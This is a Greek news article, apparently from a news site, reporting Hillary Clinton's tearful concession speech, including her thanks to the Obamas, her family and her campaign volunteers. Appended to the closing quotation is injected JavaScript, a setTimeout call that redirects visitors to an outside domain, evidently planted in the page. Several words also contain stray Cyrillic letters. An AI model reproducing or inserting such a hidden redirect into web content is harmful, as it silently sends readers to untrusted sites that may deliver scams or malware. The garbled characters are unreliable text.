Χίλαρι δακρυσμένη: Χρωστάμε στον Τραμπ μια ευκαιρία

0
10

«Ο Ντόναλντ Τραμπ θα είναι ο Πρόεδρος μας, του χρωστάμε μια ευκαιρία… να είμαστε ανοικτόμυαλοι» είπε στην έναρξη της ομιλίας της μετά την ήττα της η Χίλαρι Κλίντον.
Σεβόμαστε το κράτος δικαίου και πρέπει να προασπίσουμε τις αρχές μας είπε η υποψήφια των Δημοκρατικών.

Συνεχίζοντας ζήτησε συγγνώμη που δεν κέρδισε την εκλογική αναμέτρηση «για όλες τις αρχές και τις αξίες που μοιραζόμαστε».

«Αντιπροσωπεύετε την καλύτερη Αμερική και το να είμαι υποψήφια σας ήταν η πιο μεγάλη τιμή στη ζωή μου. Ξέρω πόσοο απογοητευμένοι αισθάνεστε γιατί κι εγώ αισθάνομαι το ίδιο».

«Είναι επώδυνο και θα είναι για πολύ καιρό. Αλλά θέλω να θυμάστε το εξής: Η καμπάνια μας δεν ήταν ποτέ για ένα πρόσωπο, ήταν σχετική με το να χτίσουμε μια χώρα που αγαπάμε, και την είδαμε να διχάζεται περισσότερο από όσο μπορούσαμε να φανταστούμε» είπε η Χίαλρι Κλίντον εμφανώς απογοητευμένη από το εκλογικό αποτέλεσμα.

Αναφερόμενη στις γυναίκες που τη στήριξαν και την πίστεψαν τόνισε ότι ήταν πολύ περήφανη που μπήκε μπροστά γι’ αυτές. «Ξέρω ότι ακόμα δεν φθάσαμε στο υψηλότερο και σκληρότερο σκαλοπάτι αλλά το ξε΄ρω ότι κάποια μέρα κάοιος θα τα κατεφέρει και ίσως είναι και νωρίτερф από όσο φαντάζεστε»

Όμως η Χίλαρι Κλίντον αναφέρθηκε και στα μικρά κοριτσάκια που την παρακολουθούν λέγοντας: «να μην αμφιβάλλετε ποτέ για την αξία σας και όбτι αξίζετε κάθε ευκαιρία…να κυνηγάτε τα όνειρά σας»

Ξεχωριστές ευχαριστίες έστειλε στον απερχόμενο πρόεδρο Μπαράκ Ομπάμα όπως και τη Μισέλ Ομπάμαю
«Για τον Μπαράκ και τη Μισέλ Ομπάμα. Η χώρα μας σας χρωστάει ένα τεράστιο χρέος ευγνωμοσύνης. Σας ευχαριστούμε για την ευγενική αλλά αποφασιστική ηγεσία σας που σημαίνει τόσα πολλά… Και στον Μπιλ και την Τσέλσι, τον Μαρκ [σ.σ. ο γαμπρός της], τη Σάρλοτ και τον Έινταν [σ.σ. τα εγγόνια της] η αγάπη μου για εσάς σημαίνει πολύ περισσότερα απ΄ όσα θα μπορούσα ποτέ να εκφράσω με λόγια. Ταξιδέψατε παντού σε αυτή τη χώρα για χάρη μου και με “σηκώσατε” όταν το χρειαζόμουν περισσότερο» είπε η κ. Κλίντον, που παράλληλα ευχαρίστησε τους υπεύθυνους της προεκλογικής της καμπάνιας.

«Στα εκατομμύρια εθελοντές, στους ηγέτες των κοινοτήτων, στους ακτιβιστές και τους διοργανωτές… Θέλω να είστε βέβαιοι ότι οι φωνές σας θα ακούγονται καθώς η χώρα θα κινείται προς τα εμπρός» τόνισε η κ. Κλίντον, ευχαριστώντας παράλληλα, τους δωρητές της καμπάνια της.

Κλείνοντας την ομιλία της τόνισε: «Πιστεύουμε ότι το αμερικανικό όνειρο είναι αρκετά μεγάλο για όλους, για άνδρες, για γυναίκες, για ομοφυλόφιλους, για ανθρώπους με ειδικές ικανότητες…Η ευθύνη μας ω ςπολίτες είναι να συνεχίσουμε να κάνουμε αυτό που μας αναλογεί στο να χτίσουμε αυτή την καλύτερη και πιο δυνατή Αμερική που όλοι επιθυμούμε» setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here